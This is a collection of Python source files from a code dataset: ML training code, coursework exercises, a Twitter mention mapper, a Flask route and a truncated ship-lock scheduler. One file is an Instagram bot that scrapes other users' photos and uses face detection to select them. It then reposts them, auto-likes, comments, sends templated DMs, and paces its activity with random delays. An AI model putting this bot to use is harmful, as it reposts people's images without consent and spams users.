train_dcn(tf_ops, training, data, directory='./data/models/dcn/playground/', overwrite=False):\n \"\"\"\n tf_ops = {\n 'dcn'\n }\n\n training {\n\n 'augmentation_probs': {\n 'resize': 0.0,\n 'flip_h': 0.5,\n 'flip_v': 0.5\n }\n }\n\n \"\"\"\n\n dcn = tf_ops['dcn']\n dcn.init()\n\n # Compute the 
number of available batches\n n_batches = data['training']['y'].shape[0] // training['batch_size']\n v_batches = data['validation']['y'].shape[0] // training['batch_size']\n\n # Structures for storing performance stats\n perf = dcn.performance\n\n caches = {\n 'loss': {'training': deque(maxlen=n_batches), 'validation': deque(maxlen=v_batches)},\n 'entropy': {'training': deque(maxlen=n_batches), 'validation': deque(maxlen=v_batches)},\n 'ssim': {'training': deque(maxlen=n_batches), 'validation': deque(maxlen=v_batches)}\n }\n\n n_tail = 5\n learning_rate = training['learning_rate']\n model_output_dirname = os.path.join(directory, dcn.model_code, dcn.scoped_name)\n \n if os.path.isdir(model_output_dirname) and not overwrite:\n return\n\n print('Output directory: {}'.format(model_output_dirname))\n\n # Create a summary writer and create the necessary directories\n sw = dcn.get_summary_writer(model_output_dirname)\n\n with tqdm.tqdm(total=training['n_epochs'], ncols=160, desc=dcn.model_code.split('/')[-1]) as pbar:\n\n for epoch in range(0, training['n_epochs']):\n\n training['current_epoch'] = epoch\n\n if epoch > 0 and epoch % training['learning_rate_reduction_schedule'] == 0:\n learning_rate *= training['learning_rate_reduction_factor']\n\n # Iterate through batches of the training data\n for batch_id in range(n_batches):\n\n # Pick random patch size - will be resized later for augmentation\n current_patch = np.random.choice(np.arange(training['patch_size'], 2 * training['patch_size']),\n 1) if np.random.uniform() < training['augmentation_probs'][\n 'resize'] else training['patch_size']\n\n # Sample next batch\n batch_x = data.next_training_batch(batch_id, training['batch_size'], current_patch)\n\n # If rescaling needed, apply\n if training['patch_size'] != current_patch:\n batch_t = np.zeros((batch_x.shape[0], training['patch_size'], training['patch_size'], 3),\n dtype=np.float32)\n for i in range(len(batch_x)):\n batch_t[i] = resize(batch_x[i], [training['patch_size'], training['patch_size']],\n anti_aliasing=True)\n batch_x = batch_t\n\n # Data augmentation - random horizontal flip\n if np.random.uniform() < training['augmentation_probs']['flip_h']: batch_x = batch_x[:, :, ::-1, :]\n if np.random.uniform() < training['augmentation_probs']['flip_v']: batch_x = batch_x[:, ::-1, :, :]\n if np.random.uniform() < training['augmentation_probs']['gamma']: batch_x = utils.batch_gamma(batch_x)\n\n # Sample dropout\n keep_prob = 1.0 if not training['sample_dropout'] else np.random.uniform(0.5, 1.0)\n\n # Make a training step\n values = dcn.training_step(batch_x, learning_rate, dropout_keep_prob=keep_prob)\n\n # TODO temporary nan hook\n if np.isnan(values['loss']):\n print('NaN loss detected - dumping current variables')\n codebook = dcn.get_codebook()\n # Get some extra stats\n if dcn.scale_latent:\n scaling = dcn.sess.run(\n dcn.graph.get_tensor_by_name('{}/encoder/latent_scaling:0'.format(dcn.scoped_name)))\n else:\n scaling = np.nan\n print('Scaling: {}'.format(scaling))\n print('Codebook: {}'.format(codebook.tolist()))\n # Dump all variables to check which is nan\n for var in dcn.parameters:\n if np.any(np.isnan(dcn.sess.run(var))):\n nan_perc = np.mean(np.isnan(dcn.sess.run(var)))\n print('!! 
NaNs found in {} --> {}'.format(var.name, nan_perc))\n return None\n\n for key, value in values.items():\n caches[key]['training'].append(value)\n\n # Record average values for the whole epoch\n for key in ['loss', 'ssim', 'entropy']:\n perf[key]['training'].append(float(np.mean(caches[key]['training'])))\n\n # Get some extra stats\n if dcn.scale_latent:\n scaling = dcn.sess.run(\n dcn.graph.get_tensor_by_name('{}/encoder/latent_scaling:0'.format(dcn.scoped_name)))\n else:\n scaling = np.nan\n\n codebook = dcn.get_codebook()\n\n # Iterate through batches of the validation data\n if epoch % training['validation_schedule'] == 0:\n\n for batch_id in range(v_batches):\n batch_x = data.next_validation_batch(batch_id, training['batch_size'])\n batch_z = dcn.compress(batch_x, is_training=training['validation_is_training'])\n batch_y = dcn.decompress(batch_z)\n\n # Compute loss\n loss_value = np.linalg.norm(batch_x - batch_y)\n caches['loss']['validation'].append(loss_value)\n\n # Compute SSIM\n ssim_value = np.mean([ssim(batch_x[r], batch_y[r], multichannel=True, data_range=1.0) for r in range(len(batch_x))])\n caches['ssim']['validation'].append(ssim_value)\n\n # Entropy\n entropy_value = utils.entropy(batch_z, codebook)\n caches['entropy']['validation'].append(entropy_value)\n\n for key in ['loss', 'ssim', 'entropy']:\n perf[key]['validation'].append(float(np.mean(caches[key]['validation'])))\n\n # Save current snapshot\n indices = np.argsort(np.var(batch_x, axis=(1, 2, 3)))[::-1]\n thumbs_pairs_all = np.concatenate((batch_x[indices[::2]], batch_y[indices[::2]]), axis=0)\n thumbs_pairs_few = np.concatenate((batch_x[indices[:5]], batch_y[indices[:5]]), axis=0)\n thumbs = (255 * plotting.thumbnails(thumbs_pairs_all, n_cols=training['batch_size'] // 2)).astype(np.uint8)\n thumbs_few = (255 * plotting.thumbnails(thumbs_pairs_few, n_cols=5)).astype(np.uint8)\n imageio.imsave(os.path.join(model_output_dirname, 'thumbnails-{:05d}.png'.format(epoch)), thumbs)\n\n # Sample latent space\n batch_z = dcn.compress(batch_x)\n\n # Save summaries to TB\n summary = tf.Summary()\n summary.value.add(tag='loss/validation', simple_value=perf['loss']['validation'][-1])\n summary.value.add(tag='loss/training', simple_value=perf['loss']['training'][-1])\n summary.value.add(tag='ssim/validation', simple_value=perf['ssim']['validation'][-1])\n summary.value.add(tag='ssim/training', simple_value=perf['ssim']['training'][-1])\n summary.value.add(tag='entropy/training', simple_value=perf['entropy']['training'][-1])\n summary.value.add(tag='scaling', simple_value=scaling)\n summary.value.add(tag='images/reconstructed',\n image=summaries.log_image(rescale(thumbs_few, 1.0, anti_aliasing=True)))\n summary.value.add(tag='histograms/latent', histo=summaries.log_histogram(batch_z))\n summary.value.add(tag='histograms/latent_approx',\n image=summaries.log_plot(visualize_distribution(dcn, data)))\n\n if dcn.train_codebook:\n summary.value.add(tag='codebook/min', simple_value=codebook.min())\n summary.value.add(tag='codebook/max', simple_value=codebook.max())\n summary.value.add(tag='codebook/mean', simple_value=codebook.mean())\n summary.value.add(tag='codebook/diff_variance',\n simple_value=np.var(np.convolve(codebook, [-1, 1], mode='valid')))\n summary.value.add(tag='codebook/centroids', image=summaries.log_plot(visualize_codebook(dcn)))\n\n sw.add_summary(summary, epoch)\n sw.flush()\n\n # Save stats to a JSON log\n save_progress(dcn, data, training, model_output_dirname)\n\n # Save current checkpoint\n 
dcn.save_model(model_output_dirname, epoch)\n\n # Check for convergence or model deterioration\n if len(perf['ssim']['validation']) > 5:\n current = np.mean(perf['ssim']['validation'][-n_tail:])\n previous = np.mean(perf['ssim']['validation'][-(n_tail + 1):-1])\n perf_change = abs((current - previous) / previous)\n\n if perf_change < training['convergence_threshold']:\n print('Early stopping - the model converged, validation SSIM change {:.4f}'.format(perf_change))\n break\n\n if current < 0.9 * previous:\n print('Error - SSIM deterioration by more than 10% {:.4f} -> {:.4f}'.format(previous, current))\n break\n\n progress_dict = {\n 'L': np.mean(perf['loss']['training'][-3:]),\n 'Lv': np.mean(perf['loss']['validation'][-1:]),\n 'lr': '{:.1e}'.format(learning_rate),\n 'ssim': '{:.2f}'.format(perf['ssim']['validation'][-1]),\n 'H': '{:.1f}'.format(np.mean(perf['entropy']['training'][-1:])),\n }\n\n if dcn.scale_latent:\n progress_dict['S'] = '{:.1f}'.format(scaling)\n\n if dcn.use_batchnorm:\n # Get current batch / population stats\n prebn = dcn.sess.run(dcn.pre_bn, feed_dict={dcn.x: batch_x})\n bM = np.mean(prebn, axis=(0, 1, 2))\n bV = np.var(prebn, axis=(0, 1, 2))\n pM = dcn.sess.run(dcn.graph.get_tensor_by_name('{}/encoder/bn_0/moving_mean:0'.format(dcn.scoped_name)))\n pV = dcn.sess.run(dcn.graph.get_tensor_by_name('{}/encoder/bn_0/moving_variance:0'.format(dcn.scoped_name)))\n\n # Append summary\n progress_dict['MVp'] = '{:.2f}/{:.2f}'.format(np.mean(pM), np.mean(pV))\n progress_dict['MVb'] = '{:.2f}/{:.2f}'.format(np.mean(bM), np.mean(bV))\n\n # Update progress bar\n pbar.set_postfix(progress_dict)\n pbar.update(1)\n","sub_path":"training/compression.py","file_name":"compression.py","file_ext":"py","file_size_in_byte":14843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"373791515","text":"# -------------------------------------------------------------------------\n# AUTHOR: Siwen Wang\n# FILENAME: decision_tree.py\n# SPECIFICATION: read the file contact_lens.csv and output the decision tree of ID3\n# FOR: CS 4200- Assignment #1\n# TIME SPENT: 20 Minutes\n# -----------------------------------------------------------*/\n\n# IMPORTANT NOTE: DO NOT USE ANY ADVANCED PYTHON LIBRARY TO COMPLETE THIS CODE SUCH AS numpy OR pandas. You have to work here only with standard vectors and arrays\n\n# importing some Python libraries\nfrom sklearn import tree\nimport matplotlib.pyplot as plt\nimport csv\n\ndb = []\nX = []\nY = []\n\n# reading the data in a csv file\nwith open('contact_lens.csv', 'r') as csvfile:\n reader = csv.reader(csvfile)\n for i, row in enumerate(reader):\n if i > 0: # skipping the header\n db.append(row)\n print(row)\n\n# transform the original training features to numbers and add to the 4D array X. For instance Young = 1, Prepresbyopic = 2, Presbyopic = 3, so X = [[1, 1, 1, 1], [2, 2, 2, 2], ...]]\n# --> add your Python code here\n# X =\ndict = {\"Young\": 1, \"Presbyopic\": 2, \"Prepresbyopic\": 3,\n \"Myope\": 1, \"Hypermetrope\": 2,\n \"No\": 1, \"Yes\": 2,\n \"Reduced\": 1, \"Normal\": 2}\nfor row in db:\n temp = []\n for i in range(len(row)-1):\n temp.append(dict.get(row[i]))\n X.append(temp)\n\n# transform the original training classes to numbers and add to the vector Y. 
For instance No = 1, Yes = 2, so Y = [1, 1, 2, 2, ...]\n# --> add your Python code here\ndict2 = {\"No\": 1, \"Yes\": 2}\nfor row in db:\n    Y.append(dict2.get(row[len(row)-1]))\n\n# fitting the decision tree to the data\nclf = tree.DecisionTreeClassifier(criterion='entropy')\nclf = clf.fit(X, Y)\n\n# plotting the decision tree (class_names must follow the sorted label order: 1 = No, 2 = Yes)\ntree.plot_tree(clf, feature_names=['Age', 'Spectacle', 'Astigmatism', 'Tear'], class_names=['No', 'Yes'], filled=True,\n               rounded=True)\nplt.show()\n","sub_path":"decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"63307975","text":"'''4. Compute the sum of the squares of the first n numbers of the array [14,25,98,75,23,1,4,56,59].\nRequirement: n must be read from input() and be smaller than the array length; it must not be hard-coded.\n'''\nn = int(input())\nlist1 = [14,25,98,75,23,1,4,56,59]\nlist_result = []\nlength = len(list1)\n\nif n > length:\n    print(\"error\")\nelse:\n    for i in range(n):\n        list_result.append(list1[i]**2)\n    result = sum(list_result)\n    print(result)  # result is only defined when n is valid\n","sub_path":"1906101033-唐超/20200219作业/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"483451559","text":"#!/usr/bin/env python3\n\nimport sys, os, tempfile, shutil\n\nfolder = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(folder + \"/..\") # Allow us to import files from one level up\n\nimport acquire, analyze, socmap\n\nif __name__ == \"__main__\":\n\tif( len(sys.argv) != 5 ):\n\t\tprint(\"USAGE: %s \" % sys.argv[0])\n\t\tsys.exit(1)\n\torigUserlist = socmap.getUsernames(sys.argv[1])\n\ttweetDir = sys.argv[2]\n\tnumLayers = int(sys.argv[3])\n\toutFileName = sys.argv[4]\n\n\tif( numLayers < 1 ):\n\t\tprint(\"ERROR: Map must include at least one layer\")\n\t\tsys.exit(1)\n\n\t# Work in a random temp directory so we can run multiple instances of\n\t# this script at once\n\tworkDir = tempfile.TemporaryDirectory()\n\tworkDirName = workDir.name\n\n\t# Setup is done, let's read all the tweets we've downloaded\n\tuserlist = origUserlist\n\tfor layer in range(0, numLayers):\n\t\tlayerMentioned = dict()\n\t\tprint(\"Layer %d: Reading data on %d users\" % (layer, len(userlist)))\n\t\tfor username in userlist:\n\t\t\tif( acquire.userTweetsPresent(username, tweetDir) ):\n\t\t\t\tmentions, rts = acquire.getUserReferences(username, tweetDir)\n\t\t\t\tlayerMentioned[username] = list(mentions)\n\t\tprint(\"Layer %d: Saving map\" % layer)\n\t\tuserlist = acquire.flattenUserDictionary(layerMentioned)\n\t\tanalyze.saveNetwork(workDirName, layer, origUserlist, dict(), layerMentioned)\n\n\t# Now move the final map over to the user-requested location\n\torigFileName = workDirName + \"/layer\" + str(numLayers) + \".gml\"\n\tshutil.move(origFileName, outFileName)\n","sub_path":"tools/buildMentionMap.py","file_name":"buildMentionMap.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"428435563","text":"#! /usr/bin/python3\n\"\"\"\n    InstabotAI - Instagram Bot With Face Detection\n    Intro:\n    This bot auto-scrapes users from the -l argument;\n    if a face is detected it will repost, repost to\n    stories, send DM to users, like and comment that\n    photo. 
If no face is detected in image it will\n scrape the next profile in list.\n\n Github:\n https://github.com/instagrambot/instabotai\n\n Workflow:\n Repost best photos from users to your account\n By default bot checks username_database.txt\n The file should contain one username per line!\n\"\"\"\nimport face_recognition\nimport instagram_scraper as insta\nfrom instabot import Bot, utils\nimport argparse\nimport os\nimport sys\nimport json\nimport time\nimport logging\nfrom random import randint\nfrom tqdm import tqdm\nimport random\n\n# Config\nimage_comment = \"Wow nice picture, i have just reposted it\"\n\n# Logging Output default settings\nlogging.basicConfig(stream=sys.stdout, format='',\n level=logging.INFO, datefmt=None)\nlog = logging.getLogger(__name__)\n\n# Parse arguments from Cli into variables\nparser = argparse.ArgumentParser(add_help=True)\nparser.add_argument('-u', type=str, help=\"username\")\nparser.add_argument('-p', type=str, help=\"password\")\nparser.add_argument('-l', type=str, help=\"therock,kimkardashian\")\nparser.add_argument('-t', type=str, help=\"#hotgirls,#models,#like4like\")\nparser.add_argument('-proxy', type=str, help=\"proxy\")\nparser.add_argument('-file', type=str, help=\"users filename\")\nparser.add_argument('-amount', type=int, help=\"amount\", default=1)\nparser.add_argument('users', type=str, nargs='*', help='users')\nargs = parser.parse_args()\nInstaUsername = args.u\n\n\n\n## Seperate users into list file\ndef help_output():\n if not args.u:\n log.info('python3 example.py -u for username -p password -l therock,kimkardashian -t \"#like4like#follow4follow\"')\n sys.exit()\n\nhelp_output()\n\nuserlist = args.l\ninstagramtags = args.t\n\nusername = InstaUsername\n\nsys.path.append(os.path.join(sys.path[0], '../'))\n\nUSERNAME_DATABASE = 'username_database.txt'\nPOSTED_MEDIAS = 'posted_medias.txt'\n\nwith open('instaprofiles.txt', 'w') as f:\n if f:\n userlist = userlist.replace(\",\", \"\\n\")\n f.write(userlist)\n\n# Open Userdb and put them into a list also write your username to database\ndef open_profiles():\n # Profiles to scrape and repost\n global insta_profiles\n insta_profiles = []\n\n with open(\"instaprofiles.txt\") as f:\n insta_profiles = f.read().splitlines()\n f.close()\n\n # Output userenames in a txt file\n global userdb\n userdb = '\\n'.join(insta_profiles)+'\\n'\n with open('userdb.txt', 'w') as f:\n f.write(userdb)\n\n global username\n time.sleep(1)\n with open('username_database.txt', 'w') as f:\n f.write(username)\n\nnumber_last_photos = 3\nx = 0\n\ndef watch_stories():\n args.u = InstaUsername\n\n if len(sys.argv) >= 2:\n print(\n \"\"\"\n Going to get '%s' likers and watch their stories (and stories of their likers too).\n \"\"\" % (insta_profiles[x])\n )\n user_to_get_likers_of = bot.convert_to_user_id(insta_profiles[x])\n else:\n print(\n \"\"\"\n Going to get your likers and watch their stories (and stories of their likers too).\n You can specify username of another user to start (by default we use you as a starting point).\n \"\"\"\n )\n user_to_get_likers_of = bot.user_id\n\n current_user_id = user_to_get_likers_of\n while True:\n try:\n # GET USER FEED\n if not bot.api.get_user_feed(current_user_id):\n print(\"Can't get feed of user_id=%s\" % current_user_id)\n\n # GET MEDIA LIKERS\n user_media = random.choice(bot.api.last_json[\"items\"])\n if not bot.api.get_media_likers(media_id=user_media[\"pk\"]):\n print(\n \"Can't get media likers of media_id='%s' by user_id='%s'\" % (user_media[\"pk\"], current_user_id)\n )\n\n 
likers = bot.api.last_json[\"users\"]\n liker_ids = [\n str(u[\"pk\"]) for u in likers if not u[\"is_private\"] and \"latest_reel_media\" in u\n ]\n\n # WATCH USERS STORIES\n if bot.watch_users_reels(liker_ids[:15]):\n print(\"Total stories viewed: %d\" % bot.total[\"stories_viewed\"])\n\n # CHOOSE RANDOM LIKER TO GRAB HIS LIKERS AND REPEAT\n current_user_id = random.choice(liker_ids)\n\n if random.random() < 0.05:\n current_user_id = user_to_get_likers_of\n print(\"Sleeping and returning back to original user_id=%s\" % current_user_id)\n time.sleep(10 * random.random() + 10)\n\n except Exception as e:\n # If something went wrong - sleep long and start again\n print(\"Exception:\", str(e))\n current_user_id = user_to_get_likers_of\n time.sleep(10 * random.random() + 10)\n\ndef increment():\n global x\n x = x+1\n\n\ndef bot_upload_photo(instapath, tags, media_id):\n ''' Upload photo to instagram'''\n bot.api.upload_photo(instapath, tags)\n log.info(\"Reposted: \" + media_id)\n\ndef bot_like(media_id):\n ''' Like image on instagram '''\n bot.api.like(media_id)\n log.info(\"Liked media id: \" + media_id)\n\ndef bot_comment(media_id, image_comment):\n ''' Comment image on instagram '''\n bot.comment(media_id, image_comment)\n log.info(\"Commented: \" + media_id)\n\ndef send_dm(scraped_user_id):\n ''' send dm on instagram '''\n bot.send_message(\"hi i just reposted your photo\", scraped_user_id)\n log.info(\"Private dm send to \" + scraped_user_id)\n log.info(\"Wait 2200 - 2600 sec for next repost\")\n\ndef file_creator(file_ending, encoding, write):\n ''' File creator for log files '''\n with open(username + file_ending, encoding) as f:\n file_output = f.write(str(write))\n return file_output\n\ndef random_sleep(number1, number2):\n ''' Random sleep between two numbers'''\n time_sleep = time.sleep(randint(number1, number2))\n return time_sleep\n\n\ndef InstaImageScraper():\n ''' Scrape image on profiles '''\n imgScraper = insta.InstagramScraper(usernames=[insta_profiles[x]],\n maximum=number_last_photos,\n media_metadata=True, latest=True,\n media_types=['image'])\n imgScraper.scrape()\n print(\"image scraping is running, please wait 50 seconds.\")\n\ndef face_detection(path_to_image, new_media_id, media_id):\n ''' Face Detection for image '''\n image = face_recognition.load_image_file(path_to_image)\n face_locations = face_recognition.face_locations(image)\n # If no face located scrape the next profile\n if not face_locations:\n log.info(\"There is no Face Detected scraping next profile\")\n increment()\n log.info(scraped_user)\n random_sleep(1, 6)\n instascraper(bot, new_media_id, path=POSTED_MEDIAS)\n else:\n log.info(\"There is a Face Detected scraping and posting this image\")\n log.info(scraped_user)\n random_sleep(1, 2)\n log.info(\"Media Id:\" + str(media_id))\n log.info(\"Face Location: \" + str(face_locations))\n log.info(\"Path to image: \" + path_to_image)\n\n# Instagram manipulate image and repost them\n# While x is less than instaprofiles loop this\ndef instascraper(bot, new_media_id, path=POSTED_MEDIAS):\n InstaImageScraper()\n random_sleep(1, 5)\n global x\n while x < len(insta_profiles):\n try:\n # Open insta_profiles[x] and it's scraped\n # json file take first image location\n with open(insta_profiles[x]\n + '/' + insta_profiles[x] + '.json', 'r') as j:\n global scraped_user\n scraped_user = insta_profiles[x]\n json_data = json.load(j)\n time.sleep(randint(1, 10))\n newstr = (json_data[\"GraphImages\"][0][\"display_url\"])\n # Output media id of image\n media_id = 
(json_data[\"GraphImages\"][0][\"id\"])\n log.info(\"Found media id: \" + media_id)\n random_sleep(1, 5)\n logging.info(\"image string generated \" + newstr)\n time.sleep(randint(1, 5))\n imgUrl = newstr.split('?')[0].split('/')[-1]\n global instapath\n instapath = insta_profiles[x] + '/' + imgUrl\n logging.info(\"Found Instagram Path to Image: \" + instapath)\n random_sleep(1, 5)\n global tags\n tags = \"@\" + insta_profiles[x] + \" \" + instagramtags\n # Execute face_detection\n face_detection(instapath, new_media_id, media_id)\n # Append username info to csv file\n try:\n file_creator('.tsv', 'a+', saveStats)\n with open(username + '.tsv', 'r') as f:\n last_line = f.readlines()[-2].replace(\"False\", \"\")\n log.info(\"Date - Time - Followers - Following - Posts\")\n log.info(last_line)\n\n # Write username tsv file if it does not exist\n except:\n file_creator('.tsv', 'w+', saveStats)\n with open(username + '.tsv', 'r') as f:\n last_line = f.readlines()[-1]\n log.info(\"Date - Time - Followers - Following - Posts\")\n log.info(last_line)\n\n # Append username info to csv file\n try:\n file_creator('_posted.tsv', 'a+', imgUrl + '\\n')\n with open(username + '_posted.tsv', 'r') as f:\n last_line = f.readlines()[-1]\n with open(username + '_posted.tsv', 'r') as f:\n all_lines = f.readlines()[0:-2]\n all_lines = (str(all_lines))\n log.info(\"Posted Media\")\n log.info(last_line)\n # if imgurl is in file username_posted scrape next profile\n if str(imgUrl) in str(all_lines):\n try:\n log.info(\"Image found in database scraping next profile\")\n x += 1\n log.info(\"image found of: \" + scraped_user)\n random_sleep(1, 2)\n instascraper(bot, new_media_id, path=POSTED_MEDIAS)\n\n except:\n log.info(\"image found of: \" + scraped_user)\n x += 1\n random_sleep(1, 2)\n instascraper(bot, new_media_id, path=POSTED_MEDIAS)\n\n # Write username tsv file if it does not exist\n except:\n file_creator('_posted.tsv', 'a+', imgUrl + '\\n')\n with open(username + '_posted.tsv', 'r') as f:\n last_line = str(f.readlines()[-1])\n all_lines = str(f.readlines()[0:-2])\n\n log.info(\"Posted media\")\n logging(last_line)\n if imgUrl in all_lines:\n log.info(\"Image found in database scraping next profile\")\n x += 1\n log.info(\"image of \" + scraped_user)\n random_sleep(1, 2)\n instascraper(bot, new_media_id, path=POSTED_MEDIAS)\n\n # Execute the repost function\n random_sleep(1, 2)\n # Repost image as story\n log.info(\"Waiting\")\n random_sleep(100, 120)\n bot.upload_story_photo(instapath)\n log.info(\"Photo Uploaded to Story\")\n # Like Image\n bot_like(media_id)\n random_sleep(10, 25)\n # Comment on Image\n bot_comment(media_id, image_comment)\n random_sleep(11, 26)\n # Repost image\n bot_upload_photo(instapath, tags, media_id)\n random_sleep(2, 5)\n print(user_id)\n scraped_user_id = bot.get_user_id_from_username(scraped_user)\n send_dm(scraped_user_id)\n random_sleep(2,5)\n# watch_stories()\n random_sleep(3200, 3800)\n except:\n log.info(\"image set to private \" + scraped_user)\n x += 1\n random_sleep(10, 22)\n instascraper(bot, new_media_id, path=POSTED_MEDIAS)\n x += 1\n x = 0\n random_sleep(5, 10)\n instascraper(bot, new_media_id, path=POSTED_MEDIAS)\n\n\n# All main stuff gets executed\nopen_profiles()\nrandom_sleep(5, 10)\nbot = Bot()\nbot.login(username=args.u, password=args.p, proxy=args.proxy)\nrandom_sleep(5, 10)\nuser_id = bot.get_user_id_from_username(args.u)\nusername = bot.get_username_from_user_id(user_id)\nsaveStats = bot.save_user_stats(username)\nusers = None\nif args.users:\n users = 
args.users\nelif args.file:\n users = utils.file(args.file).list\ninstascraper(bot, users, args.amount)\n","sub_path":"instabotai/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"516940913","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# __author__: Yxn\n# date: 2016/10/17\n\n\nfrom flask import Blueprint, render_template\nfrom flask_login import login_required\nfrom ..forms.svn import Svn\n\nsvn = Blueprint('svn',\n __name__,\n url_prefix='/dashboard/svn')\n\n\n@svn.route('/')\n# @login_required\ndef index():\n form = Svn()\n\n return render_template('svn/index.html', form=form)\n","sub_path":"app/views/svn.py","file_name":"svn.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"558337456","text":"import Ships\nimport networkx as nx\n\nT = Ships.T\nA = Ships.ships\narrivals = Ships.arrival_times\npositions = Ships.arrival_positions\nsp = []\n\n\ndef find_ak_for_s(curr_ship):\n curr_position = curr_ship.arrival_position\n k = 0\n\n for i in range(len(A)):\n arrival_time = A[i].arrival_time\n interval_end = curr_ship.arrival_time + T\n if arrival_time < interval_end and A[i].arrival_position != curr_position:\n k += 1\n if arrival_time >= interval_end:\n break\n\n return k\n\n\ndef calc_cost_leaving_s(curr_ship):\n cost = 0\n\n for a in A:\n\n if curr_ship.arrival_time > a.arrival_time and curr_ship.arrival_position == a.arrival_position:\n cost += curr_ship.arrival_time - a.arrival_time\n elif curr_ship.arrival_time + T > a.arrival_time and curr_ship.arrival_position != a.arrival_position:\n cost += curr_ship.arrival_time + T - a.arrival_time\n\n return cost\n\n\ndef calc_cost_enter_t(curr_ship, poss):\n cost = 0\n all_ships = A.copy()\n del all_ships[0:poss + 1]\n\n if all_ships:\n for a in all_ships:\n\n interval_start = curr_ship.arrival_time\n interval_end = curr_ship.arrival_time + 2 * T\n if a.arrival_time >= interval_start:\n while interval_start < A[len(A) - 1].arrival_time:\n if interval_start < a.arrival_time <= interval_end and curr_ship.arrival_position == a.arrival_position:\n cost += interval_end - a.arrival_time\n elif interval_start + T < a.arrival_time <= interval_end + T and curr_ship.arrival_position != a.arrival_position:\n cost += interval_end + T - a.arrival_time\n\n interval_start += (2 * T)\n interval_end += (2 * T)\n\n return cost\n\n\n# This function will find subscript l (number of ships arriving at positiom 1 - p(b))\n# of node b_l in layer L(b) for block1 and block2\ndef block_bl(t_a, t_b, block):\n b_l = 0\n block_length = block[2]\n for i in range(len(A)):\n\n if block_length > 1:\n if t_a.arrival_time + (block_length - 1) * T < arrivals[i] <= t_b.arrival_time + T and positions[i] != t_b.arrival_position:\n b_l += 1\n else:\n if t_a.arrival_time < arrivals[i] <= t_b.arrival_time + T and positions[i] != t_b.arrival_position:\n b_l += 1\n\n return b_l\n\n\ndef block2_cost(a_ship, a_poss, b_ship, block):\n cost = 0\n all_ships = A.copy()\n del all_ships[0: a_poss + 1]\n t_a = a_ship.arrival_time\n t_b = b_ship.arrival_time\n\n if all_ships:\n for a in all_ships:\n\n numb_of_lock_movm_left = block[2]\n\n if a_ship.arrival_position == b_ship.arrival_position:\n\n if a_ship.arrival_position == a.arrival_position:\n\n interval_start = t_a\n mid_interval = interval_start + 2 * T\n numb_of_lock_movm_left -= 2\n interval_end = t_b\n\n # 
Check if ship's arrival time is before or after the interval\n                    if interval_end <= a.arrival_time or interval_start >= a.arrival_time:\n                        continue\n\n                    cost = calc_cost(a, cost, interval_end, interval_start, mid_interval, numb_of_lock_movm_left, a_ship, b_ship)\n\n                else:\n                    interval_start = t_a + T\n                    numb_of_lock_movm_left -= 3\n                    interval_end = t_b + T\n\n                    if interval_end <= a.arrival_time or interval_start >= a.arrival_time:\n                        continue\n\n                    if numb_of_lock_movm_left < 0:\n                        mid_interval = interval_start\n                    else:\n                        mid_interval = interval_start + 2 * T\n\n                    cost = calc_cost(a, cost, interval_end, interval_start, mid_interval, numb_of_lock_movm_left, a_ship, b_ship)\n\n            else:\n                if a_ship.arrival_position == a.arrival_position:\n\n                    interval_start = t_a\n                    mid_interval = interval_start + 2 * T\n                    numb_of_lock_movm_left -= 2\n                    interval_end = t_b + T\n\n                    if interval_end <= a.arrival_time or interval_start >= a.arrival_time:\n                        continue\n\n                    cost = calc_cost(a, cost, interval_end, interval_start, mid_interval, numb_of_lock_movm_left, a_ship, b_ship)\n\n                else:\n                    interval_start = t_a + T\n                    numb_of_lock_movm_left -= 3\n                    interval_end = t_b\n\n                    if interval_end <= a.arrival_time or interval_start >= a.arrival_time:\n                        continue\n\n                    if numb_of_lock_movm_left < 0:\n                        mid_interval = interval_start\n                    else:\n                        mid_interval = interval_start + 2 * T\n\n                    cost = calc_cost(a, cost, interval_end, interval_start, mid_interval, numb_of_lock_movm_left, a_ship, b_ship)\n\n    return cost\n\n\n# Check if the ship can be transferred within the next lock movement,\n# i.e. whether a lock movement is possible within the current interval,\n# by increasing the number of mid_intervals by 2T until there are no movements left.\n# If there are no movements left, the ship will be moved at the end of the interval.\ndef calc_cost(a, cost, interval_end, interval_start, mid_interval, numb_of_lock_movm_left, aship, bship):\n    while True:\n\n        if numb_of_lock_movm_left <= 0:\n            cost += interval_end - a.arrival_time\n            break\n\n        if interval_start < a.arrival_time <= mid_interval:\n            cost += mid_interval - a.arrival_time\n            break\n\n        if numb_of_lock_movm_left > 0:\n            if numb_of_lock_movm_left - 2 <= 0 or aship.arrival_position != bship.arrival_position:\n                mid_interval += numb_of_lock_movm_left * T\n                numb_of_lock_movm_left = 0\n            else:\n                mid_interval += 2 * T\n                numb_of_lock_movm_left -= 2\n            continue\n\n    return cost\n\n\ndef create_blocks(a_ship, a_poss, b_poss, block1, block2, g):\n    block_lenght = int((A[b_poss].arrival_time - a_ship.arrival_time) / T)\n    if a_ship.arrival_time + 2 * T <= A[b_poss].arrival_time and a_ship.arrival_position == A[b_poss].arrival_position:\n        if block_lenght % 2 != 0:\n            block_lenght -= 1\n\n        block2.append((a_poss + 1, b_poss + 1, 
